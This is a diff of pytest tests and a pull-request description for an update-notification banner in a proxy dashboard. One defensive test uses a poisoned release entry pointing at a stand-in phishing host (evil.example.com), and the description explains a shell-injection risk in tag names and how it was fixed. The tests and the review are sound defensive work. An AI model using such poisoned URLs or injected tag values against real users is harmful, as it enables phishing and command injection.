+        {"tag_name": "mastio-v0.3.7",
+         "html_url": "https://github.com/cullis-security/cullis/releases/tag/mastio-v0.3.7"},
+        {"tag_name": "mastio-v0.3.8",
+         "html_url": "https://github.com/cullis-security/cullis/releases/tag/mastio-v0.3.8"},
+    ]
+
+    def handler(request):
+        return httpx.Response(200, json=payload)
+
+    transport = httpx.MockTransport(handler)
+    real_async_client = httpx.AsyncClient
+
+    def patched_async_client(*args, **kwargs):
+        kwargs.setdefault("transport", transport)
+        return real_async_client(*args, **kwargs)
+
+    monkeypatch.setattr(httpx, "AsyncClient", patched_async_client)
+    info = await update_check._fetch_latest_from_github()
+    assert info is not None
+    assert info.tag == "mastio-v0.3.8", (
+        f"expected the final release to beat the rc; got {info.tag}"
+    )
+
+
+@pytest.mark.asyncio
+async def test_fetch_refuses_non_github_html_url(monkeypatch):
+    """Defensive: a poisoned response that points html_url at evil.com
+    must be skipped so the modal can't redirect the operator off-site."""
+    import httpx
+    from mcp_proxy.dashboard import update_check
+
+    payload = [{
+        "tag_name": "mastio-v0.9.9",
+        "html_url": "https://evil.example.com/phish",
+    }]
+
+    def handler(request):
+        return httpx.Response(200, json=payload)
+
+    transport = httpx.MockTransport(handler)
+    real_async_client = httpx.AsyncClient
+
+    def patched_async_client(*args, **kwargs):
+        kwargs.setdefault("transport", transport)
+        return real_async_client(*args, **kwargs)
+
+    monkeypatch.setattr(httpx, "AsyncClient", patched_async_client)
+    info = await update_check._fetch_latest_from_github()
+    assert info is None, (
+        "non-github.com html_url must be refused to prevent operator "
+        "phishing via a poisoned release entry"
+    )
+
+
+@pytest.mark.asyncio
+async def test_fetch_returns_none_on_http_error(monkeypatch):
+    import httpx
+    from mcp_proxy.dashboard import update_check
+
+    def handler(request):
+        return httpx.Response(503)
+
+    transport = httpx.MockTransport(handler)
+    real_async_client = httpx.AsyncClient
+
+    def patched_async_client(*args, **kwargs):
+        kwargs.setdefault("transport", transport)
+        return real_async_client(*args, **kwargs)
+
+    monkeypatch.setattr(httpx, "AsyncClient", patched_async_client)
+    info = await update_check._fetch_latest_from_github()
+    assert info is None
+
+
+# ── /proxy/api/update-status dashboard endpoint ────────────────────────
+
+
+async def _spin_proxy(tmp_path, monkeypatch):
+    monkeypatch.setenv(
+        "MCP_PROXY_DATABASE_URL",
+        f"sqlite+aiosqlite:///{tmp_path}/p.sqlite",
+    )
+    monkeypatch.delenv("PROXY_DB_URL", raising=False)
+    monkeypatch.setenv("PROXY_LOCAL_SWEEPER_DISABLED", "1")
+    monkeypatch.setenv("MCP_PROXY_STANDALONE", "true")
+    monkeypatch.setenv("CULLIS_MASTIO_VERSION", "0.3.7")
+    from mcp_proxy.config import get_settings
+    get_settings.cache_clear()
+    from mcp_proxy.main import app
+    return app
+
+
+async def _admin_login(client: AsyncClient) -> str:
+    from mcp_proxy.dashboard.session import set_admin_password
+    await set_admin_password("test-password-1234")
+    r = await client.post(
+        "/proxy/login",
+        data={"password": "test-password-1234"},
+        follow_redirects=False,
+    )
+    assert r.status_code == 303
+    # Pull a CSRF token from any logged-in page that includes one.
+    page = await client.get("/proxy/overview")
+    import re
+    m = re.search(r'name="csrf_token" value="([^"]+)"', page.text)
+    return m.group(1) if m else ""
+
+
+@pytest.mark.asyncio
+async def test_endpoint_returns_empty_when_no_session(tmp_path, monkeypatch):
+    app = await _spin_proxy(tmp_path, monkeypatch)
+    transport = ASGITransport(app=app)
+    async with app.router.lifespan_context(app):
+        async with AsyncClient(transport=transport, base_url="http://test") as cli:
+            r = await cli.get("/proxy/api/update-status")
+            assert r.status_code == 200
+            assert r.text == "", (
+                "anonymous visitor must not learn whether an update is "
+                "available — empty fragment matches the badge pattern"
+            )
+    from mcp_proxy.config import get_settings
+    get_settings.cache_clear()
+
+
+@pytest.mark.asyncio
+async def test_endpoint_renders_banner_when_available(tmp_path, monkeypatch):
+    app = await _spin_proxy(tmp_path, monkeypatch)
+    transport = ASGITransport(app=app)
+    async with app.router.lifespan_context(app):
+        async with AsyncClient(transport=transport, base_url="http://test") as cli:
+            await _admin_login(cli)
+
+            from mcp_proxy.dashboard import update_check
+
+            async def fake_fetch():
+                return update_check.ReleaseInfo(
+                    tag="mastio-v0.3.8",
+                    html_url="https://github.com/cullis-security/cullis/releases/tag/mastio-v0.3.8",
+                )
+
+            monkeypatch.setattr(
+                update_check, "_fetch_latest_from_github", fake_fetch,
+            )
+            r = await cli.get("/proxy/api/update-status")
+            assert r.status_code == 200
+            assert "Mastio update available" in r.text
+            assert "mastio-v0.3.8" in r.text
+            # The stripped version makes it into the tarball URL.
+            assert "cullis-mastio-bundle-0.3.8.tar.gz" in r.text
+    from mcp_proxy.config import get_settings
+    get_settings.cache_clear()
+
+
+@pytest.mark.asyncio
+async def test_dismiss_endpoint_persists_and_hides_banner(tmp_path, monkeypatch):
+    app = await _spin_proxy(tmp_path, monkeypatch)
+    transport = ASGITransport(app=app)
+    async with app.router.lifespan_context(app):
+        async with AsyncClient(transport=transport, base_url="http://test") as cli:
+            csrf = await _admin_login(cli)
+
+            from mcp_proxy.dashboard import update_check
+
+            async def fake_fetch():
+                return update_check.ReleaseInfo(
+                    tag="mastio-v0.3.8",
+                    html_url="https://github.com/cullis-security/cullis/releases/tag/mastio-v0.3.8",
+                )
+
+            monkeypatch.setattr(
+                update_check, "_fetch_latest_from_github", fake_fetch,
+            )
+            # First call → banner renders.
+            r1 = await cli.get("/proxy/api/update-status")
+            assert "Mastio update available" in r1.text
+
+            # Dismiss.
+            r2 = await cli.post(
+                "/proxy/api/update-status/dismiss",
+                data={"csrf_token": csrf},
+                follow_redirects=False,
+            )
+            assert r2.status_code == 303
+
+            # Subsequent banner GET returns empty.
+            r3 = await cli.get("/proxy/api/update-status")
+            assert r3.text == ""
+    from mcp_proxy.config import get_settings
+    get_settings.cache_clear()
+
+
+@pytest.mark.asyncio
+async def test_dismiss_requires_csrf(tmp_path, monkeypatch):
+    app = await _spin_proxy(tmp_path, monkeypatch)
+    transport = ASGITransport(app=app)
+    async with app.router.lifespan_context(app):
+        async with AsyncClient(transport=transport, base_url="http://test") as cli:
+            await _admin_login(cli)
+            r = await cli.post(
+                "/proxy/api/update-status/dismiss",
+                data={"csrf_token": "wrong"},
+                follow_redirects=False,
+            )
+            assert r.status_code == 303
+            assert "error=csrf" in r.headers["location"]
+    from mcp_proxy.config import get_settings
+    get_settings.cache_clear()
+
+
+# ── shared setting fetch ──────────────────────────────────────────────
+
+
+async def _get_settings():
+    from mcp_proxy.config import get_settings
+    return get_settings()


### PR DESCRIPTION
## Summary

Notify operators when a newer Mastio release is published, without auto-applying the upgrade. The Mastio polls GitHub releases API directly (operational concern, NOT via Court), caches the latest `mastio-v*` tag in `proxy_config` for 24h, renders a dismissible amber banner on the dashboard with the four shell commands the operator runs on the host.

- **No "click to upgrade" button by design**. Putting the upgrade flow inside the Mastio container requires either docker socket access (= root on host on compromise) or a sidecar updater (= new high-value target). Both cross the privilege boundary the threat model refuses. Banner-with-copy-paste stays purely informational.
- **Court is federation broker, NOT management hub**. Each org sovereign on its own update lifecycle. New architectural principle captured in memory `feedback_court_is_federation_broker_not_management_hub`.

## Threat model

- Outbound HTTP added to `api.github.com`. Deliberate, justified: operational concerns flow per-org, only federation goes via Court.
- Login-gated GET (anonymous can't fingerprint Mastio version).
- CSRF-protected POST for dismiss.
- `html_url` filtered to `https://github.com/` to prevent operator phishing via poisoned release entries.
- Semver suffix regex tightened to `[A-Za-z0-9.]+` to prevent shell-metacharacter injection in tag names rendered into the copy-paste commands block (security review Vuln 1, MEDIUM, confidence 8, fixed in commit `cd1a1d11`).
- Belt-and-suspenders `_TAG_SAFE_RE` re-validation in `get_update_status` catches legacy cached values or DB tampering.

## Security review

`/security-review` round 1: 1 MEDIUM finding (shell injection via copy-paste from poisoned tag with shell metacharacters in suffix). Fix applied in `cd1a1d11`. `/security-review` round 2: **NO FINDINGS**.

## Test plan

- [x] 20 unit + endpoint tests (semver compare, cache TTL, transport failure, mock GitHub responses, non-github.com URL refusal, dashboard auth/CSRF, dismiss-then-re-surface, shell metacharacter rejection, poisoned cached tag refusal)
- [x] 105/105 green across cross-suite (update_check + dashboard_oidc + dashboard + users_via_ambassador + admin_users)
- [x] `./sandbox/smoke.sh full` — 25/0/1 (B4.9 pre-existing skip)
- [ ] Live dogfood on VM after deploy of mastio-v0.3.9 (banner should show + dismiss + reappear on newer release)

## Out of scope for this PR (follow-up)

- `--upgrade-bundle <version>` CLI on `deploy.sh` to automate the four commands the banner surfaces (Opzione D fase 2, ADR + ~3h)
- Bind mounts migration for Mastio bundle (asimmetria vs Frontdesk, ~1-2h)
- Vault-backed Org CA (ADR + 1-2g)